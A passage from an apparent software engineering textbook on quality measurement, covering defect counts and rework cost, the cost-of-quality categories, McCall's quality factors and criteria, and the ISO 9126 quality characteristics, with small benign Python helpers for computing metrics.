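    return passed_tests / designed_tests

def learnability(times_to_competence):
    """Average elapsed time for typical users to reach a set competence level."""
    return sum(times_to_competence) / len(times_to_competence)

print(functionality_measure(182, 200))  # 0.91 of the functionalities verified
print(learnability([30, 45, 25, 40]))   # 35.0 minutes on average
```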

Measurement of Manufacturer's View. Manufacturers are interested in obtaining measures of the following two different quantities:

• Defect Count: How many defects have been detected?

• Rework Cost: How much does it cost to fix the known defects?

Defect count represents the number of all the defects that have been detected so far. If a product is in operation, this count includes the defects detected during development and operation. A defect count reflects the quality of work produced. Merely counting the defects is of not much use unless something can be done to improve the development process to reduce the defect count in subsequent projects. One can analyze the defects as follows:

• For each defect, identify the development phase in which it was introduced and the phase in which it was discovered. Let us assume that a large fraction of the defects are introduced in the requirements gathering phase, and those are discovered during system testing. Then we can conclude that requirements analysis was not adequately performed. We can also conclude that work done subsequently, such as design verification and unit testing, was not of a high standard. If a large number of defects are found during system operation, one can say that system testing was not rigorously performed.

• Categorize the defects based on modules. Assuming that a module is a cohesive entity performing a well-defined task, by identifying the modules containing most of the defects we can identify where things are going wrong. This information can be used in managing resources. For example, if a large number of defects are found in a communication module in a distributed application, more resources could be allocated to train developers in the details of the communication system.

• To compare defects across modules and products in a meaningful way, normalize the defect count by product size. By normalizing defect count by product size in terms of the number of LOC, we can obtain a measure called defect density. Intuitively, defect density is expressed as the number of defects found per thousand lines of code (see the sketch after this list).

• Separate the defects found during operation from the ones found during development. The ratio of the number of defects found during operation to the total number of defects is a measure of the effectiveness of the entire gamut of test activities. If the ratio is close to zero, we can say that testing was highly effective. On the other hand, if the ratio is farther from the ideal value of zero, say 0.2, it is apparent that all the testing activities detected only 80% of the defects.
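The two normalized measures in the list above take only a few lines to state. In this sketch (ours; the counts are hypothetical), defect density is defects per thousand lines of code, and test effectiveness is judged by the share of defects that escaped to operation:

```python
# Sketch: defect density (defects per KLOC) and the operation-defect ratio used
# above as a measure of test effectiveness. All counts are hypothetical.

def defect_density(defects, lines_of_code):
    """Defects found per thousand lines of code (KLOC)."""
    return defects / (lines_of_code / 1000)

def escape_ratio(operation_defects, total_defects):
    """Share of all defects found only during operation (0 is the ideal value)."""
    return operation_defects / total_defects

print(defect_density(94, 47_000))  # 2.0 defects per KLOC
print(escape_ratio(20, 100))       # 0.2 -> testing caught only 80% of the defects
```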

After defects are detected, the developers make an effort to fix them. Ultimately, it costs some money to fix defects—this is apart from the "reputation" cost to an organization from defects discovered during operation. The rework cost includes all the additional cost associated with defect-related activities, such as fixing documents. Rework is an additional cost that is incurred due to work being done in a less than perfect manner the first time it was done. It is obvious that organizations strive to reduce the total cost of software development, including the rework cost. The rework cost can be split into two parts as follows:

• Development Rework Cost: This is the rework cost incurred before a product is released to the customers.

• Operation Rework Cost: This is the rework cost incurred when a product is in operation.

On the one hand, the development rework cost is a measure of development efficiency. In other words, if the development rework cost is zero, then the development efficiency is very high. On the other hand, the operation rework cost is a measure of the delivered quality of the product in operation. If the operation rework cost is zero, then the delivered quality of the product in operation is very high. This is because the customers have not encountered any defects and, consequently, the development team is not spending any resources on defect fixing.


COST OF QUALITY

The "cost of quality" isn't the price of creating a quality product or service. It's the cost of NOT creating a quality product or service.

Every time work is redone, the cost of quality increases. Obvious examples include:

• The reworking of a manufactured item.
• The retesting of an assembly.
• The rebuilding of a tool.
• The correction of a bank statement.
• The reworking of a service, such as the reprocessing of a loan operation or the replacement of a food order in a restaurant.

In short, any cost that would not have been expended if quality were perfect contributes to the cost of quality.

DEFINITION

Cost of Quality (COQ) is a measure that quantifies the cost of control/conformance and the cost of failure of control/non-conformance. In other words, it sums up the costs related to prevention and detection of defects and the costs due to occurrences of defects.

• Definition by ISTQB: Cost of quality: the total costs incurred on quality activities and issues, often split into prevention costs, appraisal costs, internal failure costs, and external failure costs.

• Definition by QAI: Money spent beyond expected production costs (labor, materials, equipment) to ensure that the product the customer receives is a quality (defect-free) product. The Cost of Quality includes prevention, appraisal, and correction or repair costs.

• The cost of poor quality covers internal and external costs resulting from failing to meet requirements.

• The cost of good quality covers costs for investing in the prevention of non-conformance to requirements and costs for appraising a product or service for conformance to requirements.

Total Quality Costs

Quality costs are the total of the costs incurred by:

• Investing in the prevention of nonconformance to requirements.
• Appraising a product or service for conformance to requirements.
• Failing to meet requirements.
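In sketch form (ours; the category amounts are hypothetical), the total cost of quality is simply the sum of those three kinds of spending, with the failure component split into the internal and external categories described below:

```python
# Sketch: total cost of quality (COQ) as prevention + appraisal + failure costs.
# Amounts are hypothetical (e.g., dollars per release).

costs = {
    "prevention": 40_000,         # training, quality planning, process improvement
    "appraisal": 60_000,          # inspection, testing, audits
    "internal_failure": 75_000,   # scrap, rework, retesting before shipment
    "external_failure": 125_000,  # complaints, returns, warranty claims, recalls
}

total_coq = sum(costs.values())
failure_share = (costs["internal_failure"] + costs["external_failure"]) / total_coq
print(total_coq)                # 300000
print(round(failure_share, 2))  # 0.67 -- most COQ here comes from failure, not prevention
```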


Categorization of Quality Costs

1. Prevention Costs


It is much better to prevent defects than to find and remove them from products. The costs incurred to avoid or minimize the number of defects in the first place are known as prevention costs. Some examples of prevention costs are improvement of manufacturing processes, worker training, quality engineering, statistical process control, etc.

The costs of all activities specifically designed to prevent poor quality in products or services.

Examples are the costs of:

• New product review • Quality planning • Supplier capability surveys • Process capability evaluations • Quality improvement team meetings • Quality improvement projects • Quality education and training

Prevention costs are any costs that are incurred in an effort to minimize appraisal and failure costs. This category is where most quality professionals want to live. They say an ounce of prevention is worth a pound of cure, and that is what this category is all about. It includes the activities that contribute to creation of the overall quality plan and the numerous specialized plans. Examples include:

Review of new products: The quality planning and inspection planning for new products and design of new products.

Process planning: Inspection planning, process capability studies, and other work associated with the manufacturing and service processes.

Process control: Evaluation of in-process inspection procedures and testing to determine the current status of a process.

Quality audits: Evaluating adherence to and execution of the overall quality plan.

Supplier quality selection and evaluation: Analyzing supplier quality activities prior to supplier selection, auditing supplier processes during the contract, and educating and training suppliers.

Quality training: Preparation and implementation of quality training programs. As with appraisal costs, some of this work may be performed by personnel who are not in the quality assurance department. For accounting purposes, it is important to categorize costs by the type of work being performed, not by the department of the employees performing it; activity-based costing lends itself to this.


2. Appraisal Costs

Appraisal costs (also known as inspection costs) are those costs that are incurred to identify defective products before they are shipped to customers. All costs associated with the activities that are performed during manufacturing processes to ensure required quality standards are also included in this category. Identification of defective products involves maintaining a team of inspectors, which may be very costly for some organizations.

The costs associated with measuring, evaluating or auditing products or services to assure conformance to quality standards and performance requirements.

These include the costs of:

• Incoming and source inspection/test of purchased material • In-process and final inspection/test • Product, process or service audits • Calibration of measuring and test equipment • Associated supplies and materials

Appraisal costs constitute all costs that go into the testing and inspection of products. Defective parts and products should be caught as early as possible in the manufacturing process. Appraisal costs are sometimes called inspection costs and are incurred to identify defective products before the products are shipped to customers. The problem with appraisal costs lies in the fact that they are not true "value added" activities, since inspection and testing are generally not requirements of the customer. The customer just expects the product to function as advertised, with no requirement for the product to be tested. The fact that the product is tested and advertised as such may make the customer feel better about the product, but the expectation is for the product to "just work"; if the product was never tested, the customer would not care anyway.

There are exceptions to this rule when customers require product testing as part of their purchase order / contract. So, why do we spend so many resources on testing and inspecting products? The answer is in the failure costs associated with allowing a defect to escape to the next process or customer.

Another unfortunate aspect of performing appraisal activities is that they do not keep defects from happening again. Because of this, managers see that maintaining an army of inspectors can be a very costly and ineffective approach to quality control.

Today's quality initiatives are increasingly asking employees and suppliers to be responsible for their own quality control. Further innovations are being put into designing products to be manufactured in ways that eliminate the need for inspections or testing. Engineering reliability into a product is the most efficient way to reduce quality costs.

Failure Costs


The costs resulting from products or services not conforming to requirements or customer/user needs. Failure costs are divided into internal and external failure categories.

3. Internal Failure Costs

Internal failure costs are those costs that are incurred to remove defects from the products before shipping them to customers. Examples of internal failure costs include the cost of rework, rejected products, scrap, etc.

Failure costs occurring prior to delivery or shipment of the product, or the furnishing of a service, to the customer.

Examples are the costs of:

• Scrap

• Rework

• Re-inspection

• Re-testing

• Material review

• Downgrading

Internal failure costs are incurred as a result of identifying defective products before they are shipped to customers. They include the labor, material, and (usually) overhead that went into creating the defective product. The categories are numerous and include scrap, spoilage, defectives, and so on.

They also cover the cost of correcting defective material or errors in service products that are found prior to delivery to the customer. Some examples of internal costs of quality are:

• Lost or missing information: The cost of retrieving this expected information.

• Failure analysis: The cost of analyzing nonconforming goods or services to determine the root causes.

• Supplier scrap and rework: Scrap and rework costs due to nonconforming product received from suppliers. This includes the costs to the buyer of resolving the supplier quality problems.

• 100% Sorting inspection: The cost of completing 100% inspection to sort defective units from good units.

• Retest: The cost to retest products after rework or other revision.

• Changing processes: The cost of modifying the manufacturing or service processes to correct the deficiencies.

• Redesign of hardware: The cost to change designs of hardware to correct the issues.

• Redesign of software: The internal cost of changing software designs.

• Scrapping of obsolete product: The cost of disposing of scrap.


• Scrap in support operations: Costs from defective items in indirect operations.

• Rework in internal support operations: Costs from correcting defective items in indirect operations.

• Downgrading: The cost difference between the normal selling price and the reduced price due to quality reasons.

• Variability of product characteristics: Rework losses that occur with conforming product (e.g., overfill of packages due to variability of filling and measuring equipment).

• Unplanned downtime of equipment: Loss of capacity of equipment due to failures.

• Inventory shrinkage: Loss costs due to the difference between actual and recorded inventory quantity.

• Non-value-added activities: Cost due to redundant operations, sorting inspections, and other non-value added activities. A value-added activity increases the usefulness of a product to the customer; a non-value-added activity does not.

4. External Failure Costs

External failure costs arise when defective products have been shipped to customers. They include warranties, replacements, lost sales because of a damaged reputation, payments for damages arising from the use of defective products, and so on. Shipping defective products can dissatisfy customers, damage goodwill, and reduce sales and profits.

Failure costs occurring after delivery or shipment of the product — and during or after furnishing of a service — to the customer.

Examples are the costs of:

• Processing customer complaints

• Customer returns

• Warranty claims

• Product recalls

External failure costs are the quality costs related to defects found after delivery of the product to the customer. They are generally the highest of the four cost-of-quality categories, since the full value of work and processes has already been expended to get the product to the customer. These costs are incurred because the product shipped failed to conform to quality requirements, and they may include warranties, shipping charges, repairs, recalls, legal actions, and lost sales.


External failure costs are notoriously difficult to measure because of the hidden costs associated with defective products reaching the end user. How does one measure the cost of lost sales or of lost potential customers? One method is to use customer surveys that ask questions about how customers behave when they receive a defective product.

For example, a customer survey might determine that 9 out of 10 customers who purchase a defective product simply discard it, and only 1 in 10 returns it to the manufacturer for a refund or replacement. In this case, multiplying actual customer returns by 10 provides a reasonable estimate of the number of defective units that reached customers, and hence of this element of external failure cost. The survey can also probe whether a typical customer intends to buy the product again after receiving a defective one; the number of dissatisfied customers then provides a measure of lost sales.
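To make the arithmetic concrete, the minimal sketch below applies such a survey-derived multiplier; the return rate and cost figures are purely hypothetical illustrations.

    # A minimal sketch of the survey-based estimate described above.
    # The return rate and cost figures are hypothetical illustrations.
    actual_returns = 120        # defective units actually returned by customers
    return_rate = 0.10          # survey result: only 1 in 10 defective units is returned
    cost_per_defective = 45.00  # refund/replacement, shipping, and handling per unit

    # If only 10% of defective units come back, each observed return
    # represents ten defective units in the field.
    estimated_defectives = actual_returns / return_rate
    estimated_cost = estimated_defectives * cost_per_defective
    print(estimated_defectives, estimated_cost)  # 1200.0 54000.0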

Total Quality Costs:

The sum of the above costs. This represents the difference between the actual cost of a product or service and what the reduced cost would be if there were no possibility of substandard service, failure of products or defects in their manufacture.

The internal and external failure costs are generally associated with the cost of poor quality, whereas the appraisal and prevention costs are the costs of ensuring that the product indeed conforms to requirements. The overall goal of a quality management system is to work within the appraisal and prevention cost areas, since these areas provide greater leverage to ensure quality and reduce total quality costs. For example, if a metal tube fails to meet a blueprint dimension, it is more cost effective to dimensionally inspect the tube (an appraisal cost) before it is shipped than to have the customer find the nonconformance, which adds warranty costs, shipping costs, and additional employee time to investigate the defect (external failure costs) for the manufacturer.
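A minimal sketch of this cost roll-up, with hypothetical dollar figures, shows how the total quality cost and the cost of poor quality are computed from the four categories:

    # A minimal sketch of the cost roll-up described above.
    # All dollar figures are hypothetical illustrations.
    costs = {
        "prevention": 20_000,        # e.g., quality training, process design
        "appraisal": 35_000,         # e.g., inspection and testing
        "internal_failure": 50_000,  # e.g., scrap, rework, retest
        "external_failure": 95_000,  # e.g., warranty, returns, recalls
    }

    total_quality_cost = sum(costs.values())
    cost_of_poor_quality = costs["internal_failure"] + costs["external_failure"]
    print(total_quality_cost, cost_of_poor_quality)  # 200000 145000

Shifting spend from the failure rows toward prevention and appraisal is exactly the leverage the paragraph above describes.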


Quality models

Various software quality models have been proposed to define quality and its related attributes. The most influential ones are the ISO 9126 and the CMM. The ISO 9126 quality model was developed by an expert group under the aegis of the International Organization for Standardization (ISO). The document ISO 9126 defines six broad, independent categories of quality characteristics: functionality, reliability, usability, efficiency, maintainability, and portability. The CMM was developed by the Software Engineering Institute (SEI) at Carnegie Mellon University. In the CMM framework, a development process is evaluated on a scale of 1–5, commonly known as level 1 through level 5. For example, level 1 is called the initial level, whereas level 5 (optimized) is the highest level of process maturity.

1. McCall's Quality Model (1977)

The concept of software quality and the efforts to understand it in terms of measurable quantities date back to the mid-1970s. McCall, Richards, and Walters [6] were the first to study the concept of software quality in terms of quality factors and quality criteria.

1.1 Quality Factors

A quality factor represents a behavioral characteristic of a system. Some examples of high-level quality factors are correctness, reliability, efficiency, testability, portability, and reusability. A full list of the quality factors will be given in a later part of this section. As the examples show, quality factors are external attributes of a software system. Customers, software developers, and quality assurance engineers are interested in different quality factors to a different extent. For example, customers may want an efficient and reliable software with less concern for portability. The developers strive to meet customer needs by making their system efficient and reliable, at the same time making the product portable and reusable to reduce the cost of software development. The software quality assurance team is more interested in the testability of a system so that some other factors, such as correctness, reliability, and efficiency, can be easily verified through testing. The testability factor is important to developers and customers as well: (i) developers want to test their product before delivering it to the software quality assurance team and (ii) customers want to perform acceptance tests before taking delivery of a product. In Table 17.1, we list the quality factors as defined by McCall et al. [6]. Now we explain the 11 quality factors in more detail:


TABLE 17.1 McCall’s Quality Factors

Correctness: Extent to which a program satisfies its specifications and fulfills the user's mission objectives

Reliability: Extent to which a program can be expected to perform its intended function with required precision

Efficiency: Amount of computing resources and code required by a program to perform a function

Integrity: Extent to which access to software or data by unauthorized persons can be controlled

Usability: Effort required to learn, operate, prepare input, and interpret output of a program

Maintainability: Effort required to locate and fix a defect in an operational program

Testability: Effort required to test a program to ensure that it performs its intended functions

Flexibility: Effort required to modify an operational program

Portability: Effort required to transfer a program from one hardware and/or software environment to another

Reusability: Extent to which parts of a software system can be reused in other applications

Interoperability: Effort required to couple one system with another

Source: From ref. 6.

Correctness: A software system is expected to meet the explicitly specified functional requirements and the implicitly expected nonfunctional requirements. If a software system satisfies all the functional requirements, the system is said to be correct. However, a correct software system may still be unacceptable to customers if the system fails to meet unstated requirements, such as stability, performance, and scalability. On the other hand, even an incorrect system may be accepted by users.

Reliability: It is difficult to construct large software systems which are correct. A few functions may not work in all execution scenarios, and, therefore, the software is considered to be incorrect. However, the software may still be acceptable to customers because the execution scenarios causing the system to fail may not frequently occur when the system is deployed. Moreover, customers may accept software failures once in a while. Customers may still consider an incorrect system to be reliable if the failure rate is very small and it does not adversely affect their mission objectives. Reliability is a customer perception, and an incorrect software can still be considered to be reliable.

Efficiency: Efficiency concerns to what extent a software system utilizes resources, such as computing power, memory, disk space, communication bandwidth, and energy. A software system must utilize as few resources as possible to perform its functionalities. For example, by utilizing less communication bandwidth a base station in a cellular telephone network can support more users.


Integrity: A system's integrity refers to its ability to withstand attacks on its security. In other words, integrity refers to the extent to which access to software or data by unauthorized persons or programs can be controlled. Integrity has assumed a prominent role in today's network-based applications. Integrity is also an issue in multiuser systems.

Usability: A software system is considered to be usable if human users find it easy to use. Users put much emphasis on the user interface of software systems. Without a good user interface a software system may fizzle out even if it possesses many desired qualities. However, it must be remembered that a good user interface alone cannot make a product successful; the product must also be reliable, for example. If a software fails too often, no good user interface can keep it in the market.

Maintainability: In general, maintenance refers to the upkeep of products in response to deterioration of their components due to continued use of the products. Maintainability refers to how easily and inexpensively the maintenance tasks can be performed. For software products, there are three categories of maintenance activities: corrective, adaptive, and perfective. Corrective maintenance is a postrelease activity, and it refers to the removal of defects existing in an in-service software. The existing defects might have been known at the time of release of the product or might have been introduced during maintenance. Adaptive maintenance concerns adjusting software systems to changes in the execution environment. Perfective maintenance concerns modifying a software system to improve some of its qualities.

Testability: It is important to be able to verify every requirement, both explicitly stated and simply expected. Testability means the ability to verify requirements. At every stage of software development, it is necessary to consider the testability aspect of a product. Specifically, for each requirement we try to answer the question: What procedure should one use to test the requirement, and how easily can one verify it? To make a product testable, designers may have to instrument a design with functionalities not available to the customer.

Flexibility: Flexibility is reflected in the cost of modifying an operational system. As more and more changes are effected in a system throughout its operational phase, subsequent changes may cost more and more. If the initial design is not flexible, it is highly likely that subsequent changes are very expensive. In order to measure the flexibility of a system, one has to find an answer to the question: How easily can one add a new feature to a system?

Portability: Portability of a software system refers to how easily it can be adapted to run in a different execution environment. An execution environment is a broad term encompassing hardware platform, operating system, distributedness, and heterogeneity of the hardware system, to name a few. Portability is important for developers because a minor adaptation of a system can increase its market potential. Moreover, portability gives customers an option to easily move from one execution environment to another to best utilize emerging technologies in furthering their business. Good design principles such as modularity facilitate portability. For example, all environment-related computations can be localized in a few modules so that those can be easily identified and modified to port the system to another environment.

Reusability: Reusability means that a significant portion of one product can be reused, maybe with minor modification, in another product. It may not be economically viable to reuse small components. Reusability saves the cost and time to develop and test the component being reused. In the field of scientific computing, mathematical libraries are commonly reused. Reusability is not just limited to product parts; rather, it can be applied to processes as well. For example, we are very much interested in developing good processes that are largely repeatable.

Interoperability: In this age of computer networking, isolated software systems are turning into a rarity. Today's software systems are coupled at the input–output level with other software systems. Intuitively, interoperability means whether or not the output of one system is acceptable as input to another system; it is likely that the two systems run on different computers interconnected by a network. When we consider Internet-based applications and wireless applications, the need for interoperability is simply overriding. For example, users of document processing packages, such as LaTeX and Microsoft Word, want to import a variety of images produced by different graphics packages. Therefore, the graphics packages and the document processing packages must be interoperable. Another example of interoperability is the ability to roam from one cellular phone network in one country to another cellular network in another country.

The 11 quality factors defined in Table 17.1 have been grouped into three broad categories as follows:

• Product operation

• Product revision

• Product transition

The elements of each of the three broad categories are identified and further explained in Table 17.2. It may be noted that the above three categories relate more to expectations about postdevelopment activities and less to in-development activities. In other words, McCall's quality factors put more emphasis on the quality levels of a product delivered by an organization and on the quality levels of a delivered product relevant to product maintenance. Quality factors in the product operation category refer to delivered quality. Testability is an important quality factor that is of much significance to developers during both product development and maintenance.


TABLE 17.2 Categorization of McCall’s Quality Factors

Product operation
  Correctness: Does it do what the customer wants?
  Reliability: Does it do it accurately all of the time?
  Efficiency: Does it quickly solve the intended problem?
  Integrity: Is it secure?
  Usability: Can I run it?

Product revision
  Maintainability: Can it be fixed?
  Testability: Can it be tested?
  Flexibility: Can it be changed?

Product transition
  Portability: Can it be used on another machine?
  Reusability: Can parts of it be reused?
  Interoperability: Can it interface with another system?

Source: From ref. 6.

Maintainability, flexibility, and portability are desired quality factors sought in a product so that the task of supporting the product after delivery is less expensive. Reusability is a quality factor that has the potential to reduce the development cost of a project by allowing developers to reuse some of the components from an existing product. Interoperability allows a product to coexist with other products, systems, and features.

1.2 Quality Criteria

A quality criterion is an attribute of a quality factor that is related to software development. For example, modularity is an attribute of the architecture of a software system. A highly modular software allows designers to put cohesive components in one module, thereby increasing the maintainability of the system. Similarly, traceability of a user requirement allows developers to accurately map the requirement to a subset of the modules, thereby increasing the correctness of the system. Some quality criteria relate to products and some to personnel. For example, modularity is a product-related quality criterion, whereas training concerns development and software quality assurance personnel. In Table 17.3, we list the 23 quality criteria defined by McCall et al. [6].

1.3 Relationship between Quality Factors and Criteria

The relationship between quality factors and quality criteria is shown in Figure 17.1. An arrow from a quality criterion to a quality factor means that the quality criterion has a positive impact on the quality factor. For example, traceability has a positive impact on correctness. Similarly, the quality criterion simplicity positively impacts reliability, usability, and testability.


Figure 17.1 (not reproduced): Relation between quality factors and quality criteria [6]. The figure draws an arrow from each of the 23 quality criteria (traceability, completeness, consistency, accuracy, error tolerance, execution efficiency, storage efficiency, access control, access audit, operability, training, communicativeness, simplicity, conciseness, self-descriptiveness, instrumentation, expandability, generality, modularity, machine independence, software–system independence, communications commonality, data commonality) to each of the 11 quality factors (correctness, reliability, efficiency, integrity, usability, maintainability, testability, flexibility, portability, reusability, interoperability) that it positively impacts.
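Because one criterion can feed several factors, the relation is naturally represented as a many-to-many mapping. The sketch below encodes only the edges named in the surrounding text (traceability to correctness; simplicity to reliability, usability, and testability; modularity to maintainability and portability); the complete figure defines many more.

    # A partial encoding of Figure 17.1: quality criterion -> quality
    # factors it positively impacts. Only edges mentioned in the text are
    # included; the complete figure defines many more.
    CRITERION_TO_FACTORS = {
        "traceability": {"correctness"},
        "simplicity": {"reliability", "usability", "testability"},
        "modularity": {"maintainability", "portability"},
    }

    def factors_impacted(criteria):
        """Return the set of quality factors positively impacted by the criteria."""
        impacted = set()
        for criterion in criteria:
            impacted |= CRITERION_TO_FACTORS.get(criterion, set())
        return impacted

    print(sorted(factors_impacted(["simplicity", "traceability"])))
    # ['correctness', 'reliability', 'testability', 'usability']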

Though it is desirable to improve all the quality factors, doing so may not be possible. This is because, in general, quality factors are not completely independent. Thus, we note two characteristics of the relationship as follows:

• If an effort is made to improve one quality factor, another quality factor may be degraded. For example, if an effort is made to make a software product testable, the efficiency of the software is likely to go down. To make code testable, programmers may not be able to write compact code. Moreover, if we are interested in making a product portable, the code must be written in such a manner that it is easily understandable, and, hence, code need not be in a compact form. An effort to make code portable is likely to reduce its efficiency. In fact, attempts to improve integrity, usability, maintainability, testability, flexibility, portability, reusability, and interoperability will reduce the efficiency of a software system.

• Some quality factors positively impact others. For example, an effort to enhance the correctness of a system will increase its reliability. As another example, an effort to enhance the testability of a system will improve its maintainability.


TABLE 17.3 McCall’s Quality Criteria

Access audit: Ease with which software and data can be checked for compliance with standards or other requirements

Access control: Provisions for control and protection of the software and data

Accuracy: Precision of computations and output

Communication commonality: Degree to which standard protocols and interfaces are used

Completeness: Degree to which a full implementation of the required functionalities has been achieved

Communicativeness: Ease with which inputs and outputs can be assimilated

Conciseness: Compactness of the source code, in terms of lines of code

Consistency: Use of uniform design and implementation techniques and notation throughout a project

Data commonality: Use of standard data representations

Error tolerance: Degree to which continuity of operation is ensured under adverse conditions

Execution efficiency: Run time efficiency of the software

Expandability: Degree to which storage requirements or software functions can be expanded

Generality: Breadth of the potential application of software components

Hardware independence: Degree to which the software is dependent on the underlying hardware

Instrumentation: Degree to which the software provides for measurement of its use or identification of errors

Modularity: Provision of highly independent modules

Operability: Ease of operation of the software

Self-documentation: Provision of in-line documentation that explains implementation of components

Simplicity: Ease with which the software can be understood

Software system independence: Degree to which the software is independent of its software environment (nonstandard language constructs, operating system, libraries, database management system, etc.)

Storage efficiency: Run time storage requirements of the software

Traceability: Ability to link software components to requirements

Training: Ease with which new users can use the system

Source: From ref. 6.


1.4 Quality Metrics

The high-level quality factors cannot be measured directly. For example, we cannot directly measure the testability of a software system. Neither can testability be expressed in "yes" or "no" terms. Instead, the degree of testability can be assessed by associating with testability a few quality metrics, namely, simplicity, instrumentation, self-descriptiveness, and modularity. A quality metric is a measure that captures some aspect of a quality criterion. One or more quality metrics should be associated with each criterion. The metrics can be derived as follows:

• Formulate a set of relevant questions concerning the quality criteria and seek a "yes" or "no" answer for each question.

• Divide the number of "yes" answers by the number of questions to obtain a value in the range of 0 to 1. The resulting number represents the intended quality metric.

For example, we can ask the following question concerning the self-descriptiveness of a product: Is all documentation written clearly and simply such that procedures, functions, and algorithms can be easily understood? Another question concerning self-descriptiveness is: Is the design rationale behind a module clearly understood? Different questions can have different degrees of importance in the computation of a metric, and, therefore, individual "yes" answers can be differently weighted in the above computation.
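The weighted variant of this computation is a one-liner; the minimal sketch below, with hypothetical questions and weights, makes it concrete.

    # A minimal sketch of the metric computation described above: a score
    # in [0, 1] from weighted yes/no answers. The questions and weights
    # are hypothetical illustrations.

    def quality_metric(answers, weights=None):
        """Weighted fraction of "yes" answers; equal weights by default."""
        if weights is None:
            weights = [1.0] * len(answers)
        yes = sum(w for answer, w in zip(answers, weights) if answer)
        return yes / sum(weights)

    # Three self-descriptiveness questions, the first judged twice as important.
    answers = [True, False, True]
    print(quality_metric(answers, weights=[2.0, 1.0, 1.0]))  # 0.75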

The above way of computing the value of a metric is highly subjective. The degree of subjectivity varies significantly from question to question in spite of the fact that all the responses are treated equally. It is difficult to combine different metrics to get a measure of a higher level quality factor. In addition, for some questions it is more meaningful to consider a response on a richer measurement scale. For example, the question "Is the design of a software system simple?" needs to be answered on a multiple ordinal scale to reflect a variety of possible answers, rather than a yes-or-no answer.

Similarly, one cannot directly measure the reliability of a system. However, the number of distinct failures observed so far is a measure of the initial reliability of the system. Moreover, the time gap between observed failures is treated as a measure of the reliability of a system.
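Both surrogate measures can be computed from a simple failure log; in the minimal sketch below the timestamps are hypothetical hours of operation.

    # A minimal sketch of the two reliability surrogates just mentioned:
    # the failure count and the time gaps between observed failures.
    # The timestamps (hours of operation) are hypothetical.
    failure_times = [12.0, 40.0, 95.0, 180.0]

    failure_count = len(failure_times)  # more distinct failures -> lower initial reliability
    gaps = [b - a for a, b in zip(failure_times, failure_times[1:])]
    mean_gap = sum(gaps) / len(gaps)    # larger mean gap -> higher reliability
    print(failure_count, mean_gap)      # 4 56.0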

2 ISO 9126 Model

There has been international collaboration among experts to define a general framework for software quality. An expert group, under the aegis of the ISO, standardized a software quality document, namely, ISO 9126, which defines six broad, independent categories of quality characteristics as follows:


Functionality: A set of attributes that bear on the existence of a set of functions and their specified properties. The functions are those that satisfy stated or implied needs.

Reliability: A set of attributes that bear on the capability of software to maintain its performance level under stated conditions for a stated period of time.

Usability: A set of attributes that bear on the effort needed for use and on the individual assessment of such use by a stated or implied set of users.

Efficiency: A set of attributes that bear on the relationship between the software's performance and the amount of resource used under stated conditions.

Maintainability: A set of attributes that bear on the effort needed to make specified modifications (which may include corrections, improvements, or adaptations of software to environmental changes and changes in the requirements and functional specifications).

Portability: A set of attributes that bear on the ability of software to be transferred from one environment to another (this includes the organizational, hardware, or software environment).

The ISO 9126 standard includes an example quality model, as shown in Figure 17.2, that further decomposes the quality characteristics into more concrete subcharacteristics. For example, the maintainability characteristic has been decomposed into four subcharacteristics, namely, analyzability, changeability, stability, and testability. The decomposition shown in Figure 17.2 is just a sample model, not a universal one. The 20 subcharacteristics of Figure 17.2 are defined as follows:

Suitability: The capability of the software to provide an adequate set of functions for specified tasks and user objectives.

Accuracy: The capability of the software to provide the right or agreed-upon results or effects.

Interoperability: The capability of the software to interact with one or more specified systems.

Security: The capability of the software to prevent unintended access and resist deliberate attacks intended to gain unauthorized access to confidential information or to make unauthorized modifications to information or to the program so as to provide the attacker with some advantage or so as to deny service to legitimate users.

Maturity: The capability of the software to avoid failure as a result of faults in the software.

Fault Tolerance: The capability of the software to maintain a specified level of performance in case of software faults or of infringement of its specified interface.

Recoverability: The capability of the software to reestablish its level of performance and recover the data directly affected in the case of a failure.


Figure 17.2 (not reproduced): ISO 9126 sample quality model refines the standard's features into subcharacteristics. (From ref. 4. © 1996 IEEE.) Quality characteristics and their subcharacteristics: functionality (suitability, accuracy, interoperability, security); reliability (maturity, fault tolerance, recoverability); usability (understandability, learnability, operability); efficiency (time behavior, resource behavior); maintainability (analyzability, changeability, stability, testability); portability (adaptability, installability, conformance, replaceability).


Understandability: The capability of the software product to enable the user to understand whether the software is suitable, and how it can be used for particular tasks and conditions of use.

Learnability: The capability of the software product to enable the user to learn its applications.

Operability: The capability of the software product to enable the user to operate and control it.

Attractiveness: The capability of the software product to be liked by the user.

Time Behavior: The capability of the software to provide appropriate response and processing times and throughput rates when performing its function under stated conditions.

Resource Utilization: The capability of the software to use appropriate resources in an appropriate time when the software performs its function under stated conditions.

Analyzability: The capability of the software product to be diagnosed for deficiencies or causes of failures in the software or for the parts to be modified to be identified.

Changeability: The capability of the software product to enable a specified modification to be implemented.

Stability: The capability of the software to minimize unexpected effects from modifications of the software.

Testability: The capability of the software product to enable modified software to be validated.

Adaptability: The capability of the software to be modified for different specified environments without applying actions or means other than those provided for this purpose for the software considered.

Installability: The capability of the software to be installed in a specified environment.

Coexistence: The capability of the software to coexist with other independent software in a common environment sharing common resources.

Replaceability: The capability of the software to be used in place of other specified software in the environment of that software.
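Because the sample model is a strict hierarchy, the decomposition in Figure 17.2 can be written down directly; the minimal sketch below encodes it as a mapping.

    # A minimal sketch of the decomposition in Figure 17.2: each ISO 9126
    # characteristic mapped to its subcharacteristics.
    ISO_9126 = {
        "functionality": ["suitability", "accuracy", "interoperability", "security"],
        "reliability": ["maturity", "fault tolerance", "recoverability"],
        "usability": ["understandability", "learnability", "operability"],
        "efficiency": ["time behavior", "resource behavior"],
        "maintainability": ["analyzability", "changeability", "stability", "testability"],
        "portability": ["adaptability", "installability", "conformance", "replaceability"],
    }

    # Unlike McCall's model, each subcharacteristic belongs to exactly one
    # characteristic (a point revisited below), so a reverse lookup is
    # well defined.
    parent = {sub: ch for ch, subs in ISO_9126.items() for sub in subs}
    print(parent["testability"])  # maintainability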

Organizations must define their own quality characteristics and subcharacteristics after a fuller understanding of their needs. In other words, organizations must identify the level of the different quality characteristics they need to satisfy within their context of software development. Reaching an ideally best quality level from the present one is a gradual process. Therefore, it is important to understand the need for moving on to the next achievable step toward the highest, ideally best level.

At this point it is useful to compare McCall's quality model with the ISO 9126 model. Since the two models focus on the same abstract entity, namely, software quality, it is natural that there are many similarities between the two models. What is called a quality factor in McCall's model is called a quality characteristic in the ISO 9126 model. The following high-level quality factors/characteristics are found in both models: reliability, usability, efficiency, maintainability, and portability. However, there are several differences between the two models, as explained in the following:

